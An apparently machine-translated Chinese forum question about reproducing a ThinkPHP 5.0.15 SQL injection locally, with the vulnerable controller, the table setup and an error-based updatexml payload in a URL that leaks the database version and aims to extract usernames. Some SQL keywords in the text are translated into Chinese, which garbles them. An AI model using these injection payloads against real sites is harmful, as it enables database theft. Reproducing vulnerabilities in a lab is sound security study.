我正在重新创建关于thinkphp5.0.x的sql注入漏洞
我已经可以获取version(),但是我不能获取字段内容,它说:
SQLSTATE [HY000]:一般错误:1105仅支持恒定的XPATH查询。
为什么?
thinkphp 5.0.15
php 7.2
echo1:
SQLSTATE [HY000]:常规错误:1105 XPATH语法错误:'〜5.5.53〜'
有效负载2:
http://127.0.0.1/thinkphp5.0.15/public/index.php/index/index/index?password[0]=inc&password[1]=updatexml(1,concat(0x7e,(select%20username%20from%20user限制为0,1),0x7e),1)&password [2] = 1
echo2:
SQLSTATE [HY000]:常规错误:1105仅支持常量XPATH查询 但它在mysql中回显是正确的: mysql> INSERT INTO
user(password)值(updatexml(1,concat(0x7e,(从用户限制0,1选择用户名)),1)+1); 错误1105(HY000):XPATH语法错误:'〜test'
//index.php
<?php
namespace app\index\controller;
use think\Db;
class Index
{
public function index()
{
$password = input("get.password/a");
Db::table("user")->where(["id"=>1])->insert(["password"=>$password]);
return "ThinkPHP SQL Test.";
}
}
//mysql.sql
# Host: localhost (Version: 5.5.53)
# Date: 2019-07-15 10:10:05
# Generator: MySQL-Front 5.3 (Build 4.234)
/*!40101 SET NAMES utf8 */;
create database thinkphp;
use thinkphp;
#
# Structure for table "user"
#
DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(50) DEFAULT NULL,
`password` varchar(50) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
#
# Data for table "user"
#
INSERT INTO `user` VALUES (1,'test','password');
我希望输出为SQLSTATE [HY000]:常规错误:1105 XPATH语法错误:'〜test'